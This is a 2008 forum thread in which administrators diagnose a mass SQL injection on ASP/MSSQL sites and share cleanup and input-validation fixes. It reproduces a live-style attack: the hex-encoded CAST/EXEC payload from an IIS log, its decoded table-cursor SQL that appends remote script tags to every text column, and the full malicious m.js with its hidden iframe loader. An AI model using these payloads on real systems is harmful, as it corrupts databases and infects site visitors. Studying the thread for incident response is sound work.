 |  |  |  |  |  |  |  |
SQL Injection
 |
We recently had a MSSQL injection on our server and don't know why it happened. We get a funny email in our ticket center that is at another data center that says we have an exploit in our code and then two hours later the server get hacked through our asp code and then we have multiple sql injection of this random string in some tables.
"<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.dot<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>"
If the code wont allow special character as a input into database writes, how can a person do a sql injection by phrasing off a compiled dll file that dosnt accept file attachments.
"<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.dot<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>"
If the code wont allow special character as a input into database writes, how can a person do a sql injection by phrasing off a compiled dll file that dosnt accept file attachments.
I don't know about this kind of thing but if you go to
http://www.dota11.cn/m.js
this is the file that you get, maybe it shed some light on what happened.
http://www.dota11.cn/m.js
this is the file that you get, maybe it shed some light on what happened.
if (navigator.systemLanguage=='zh-cn')
{
document.writeln("<script language=\"javascript\" src=\"http:\/\/count40.51yes.com\/click.aspx?id=408936399&logo=1\"><\/script>");
}
else{
document.writeln("<iframe src=http:\/\/www.dota11.cn\/dj.htm width=100 height=0><\/iframe>");
}
window.onerror=function(){return true};
document.write ('<script>var a3070tf="51la";var a3070pu="";var a3070pf="51la";var a3070su=window.location;var a3070sf=document.referrer;var a3070of="";var a3070op="";var a3070ops=1;var a3070ot=1;var a3070d=new Date();var a3070color="";if (navigator.appName=="Netscape"){a3070color=screen.pixelDepth;} else {a3070color=screen.colorDepth;}<\/script><script>a3070tf=top.document.referrer;<\/script><script>a3070pu =window.parent.location;<\/script><script>a3070pf=window.parent.document.referrer;<\/script><script>a3070ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3070ops=(a3070ops==null)?1: (parseInt(unescape((a3070ops)[2]))+1);var a3070oe =new Date();a3070oe.setTime(a3070oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3070ops+ ";path=/;expires="+a3070oe.toGMTString();a3070ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3070ot==null){a3070ot=1;}else{a3070ot=parseInt(unescape((a3070ot)[2])); a3070ot=(a3070ops==1)?(a3070ot+1):(a3070ot);}a3070oe.setTime(a3070oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3070ot+";path=/;expires="+a3070oe.toGMTString();<\/script><script>a3070of=a3070sf;if(a3070pf!=="51la"){a3070of=a3070pf;}if(a3070tf!=="51la"){a3070of=a3070tf;}a3070op=a3070pu;try{lainframe}catch(e){a3070op=a3070su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=15&id=1893070&tpages=\'+a3070ops+\'&ttimes=\'+a3070ot+\'&tzone=\'+(0-a3070d.getTimezoneOffset()/60)+\'&tcolor=\'+a3070color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3070of)+\'&vpage=\'+escape(a3070op)+\'" \/>\');<\/script>'); Last edited by compdoc; May 20th, 2008 at 11:34 am.
I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.
•
•
•
•
Originally Posted by Athersgeo 
I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.
- Clean the data; restore from the last known good backup.
- Immediately set the database properties to Read-only=True (right-click the database name in SQL Server management studio, select properties, edit the Read-only property, save the settings).
- Examine the IIS logs, searching for the domain that is showing up in the malicious script statments (in my case, dota11). The lines in the IIS logs that contain the script statement should point you toward the ASP file that is vulnerable.
- Fix the ASP code. In my case, a request variable was being directly used by the code without being checked, and that is how the attack was inserting the malicious script. I added a call to InStr(UCASE(requestVariable),"SCRIPT") to filter out any values containing scripts.
- Re-enable the database to Read-only=True after being reasonably sure that the ASP code is no longer vulnerable.
Thanks for the suggestions; unfortunately, at least so far, there's nothing cropping up in the IIS logs to give us a hint of which page is open - which suggests they're not using an insecure querystring to do the damage, but somehow managing to pass the data as form data.
Given all the sites that have been affected (at least so far) have no public write access to the database (only read), and the content management system uses a combination of passwords and session variables to prevent unwanted access, this is getting both more puzzling - and more worrying - by the minute.
ETA - The search has finished and it has brought to light another site that's been affected. This one does have some public write access to the database (bookings and whatnot), but that's run through a fairly strict injection trap to prevent unwanted SQL commands (as are any querystrings, come to that!), while the maintenance is hidden behind an NT logon, so in theory, this shouldn't be possible...
Given all the sites that have been affected (at least so far) have no public write access to the database (only read), and the content management system uses a combination of passwords and session variables to prevent unwanted access, this is getting both more puzzling - and more worrying - by the minute.
ETA - The search has finished and it has brought to light another site that's been affected. This one does have some public write access to the database (bookings and whatnot), but that's run through a fairly strict injection trap to prevent unwanted SQL commands (as are any querystrings, come to that!), while the maintenance is hidden behind an NT logon, so in theory, this shouldn't be possible...
Last edited by Athersgeo; May 27th, 2008 at 10:50 am.
I'm getting the exact same type of injection.
Right now I'm running a search and replace on the entire DB to see how many tables/columns this has changed.
Please do share if you have any update to this.
Thanks.
Right now I'm running a search and replace on the entire DB to see how many tables/columns this has changed.
Please do share if you have any update to this.
Thanks.
Update: found this in the IIS logs:
2008-05-23 00:15:23 W3SVC655445 190.000.0.0 POST /display.asp EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0064006F0074006100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--|324|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_';'. 80 - 58.215.65.96 Mozilla/3.0+(compatible;+Indy+Library) - - 500 0 0
They're targeting a SELECT statement in the ASP file, not an UPDATE or SELECT, and the file does not contain a form.
If you decode the CAST values, here is the actual SQL that is being injected:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T
varchar(255),@C
I've changed the ASP code to check the command line parameter value to make sure that it is numeric before passing it to a SELECT statement in the code.
EntryId = request("EntryId");
If !isNumeric(EntryId)
'bail and deploy SQL injection countermeasures
End If
So, maybe try searching your IIS logs for DECLARE or NVARCHAR or CAST and see what you come with - ?
2008-05-23 00:15:23 W3SVC655445 190.000.0.0 POST /display.asp EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0064006F0074006100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--|324|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_';'. 80 - 58.215.65.96 Mozilla/3.0+(compatible;+Indy+Library) - - 500 0 0
They're targeting a SELECT statement in the ASP file, not an UPDATE or SELECT, and the file does not contain a form.
If you decode the CAST values, here is the actual SQL that is being injected:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T
varchar(255),@C
I've changed the ASP code to check the command line parameter value to make sure that it is numeric before passing it to a SELECT statement in the code.
EntryId = request("EntryId");
If !isNumeric(EntryId)
'bail and deploy SQL injection countermeasures
End If
So, maybe try searching your IIS logs for DECLARE or NVARCHAR or CAST and see what you come with - ?
We have found that in several logs besides the affected sites, BUT, not found it in the logs for all the affected sites - which had made us a little iffy on whether the two things were connected, or whether it was two sets of people attempting to do unpleasant things to our server. We've already taken some steps to block that SQL anyway, but with that decode, that makes things a lot clearer.
Thank you very, very much!
Thank you very, very much!
|
Similar Threads
- SQL Injection Attack (Database Design)
- Data Safe - SQL Injection (PHP)
- SQL Injection Attacks (Database Design)
- Sql injection (MS SQL)
- SQl Injection through ASP and MS SQl 2000 (ASP)
- Sql Injuction (Viruses, Spyware and other Nasties)
- Working with SQL's Text data type (ASP.NET)
Other Threads in the Windows NT / 2000 / XP Forum
- Previous Thread: Slow, slow, slowwwwwwww
- Next Thread: My Computer Icon limited
| Thread Tools | Search this Thread |
You need to join our community in order to build your list of favorite forums. You can visit the forum index for a listing of all forums.
Related Forum Features
Latest Windows NT / 2000 / XP Posts
- Today's Posts
- Unanswered Threads
.net 3.5 3daccelertion 2007 2010 a.exe address alaris apache application appstore arm auto black blue book bulletin cellphones collaboration computer computerfreezes crash cursor deployment desktop desktops dns domain dotnetnuke drive eartlink error errors explorer features folder fontmanagers format framework gadgets intel interoperability killprocess laptop latitude linux load login mac memory microsoft mobile monitor motionle1600 netbooks novell nvidia operatingsystems osx outlook palm partition patch printer product rds remotedesktop remotedesktopconnection repair replacingraiddrive retrieve screen sharepoint simplifiedchinese sitetositevpn sp1 technology unreadable update usb verizon videodrivers videogames virtual virus vista visual vulnerability wab webos weecam win win32/heur windows windows7 windowsxp windowsxpnotstartingup. worm xp xpde
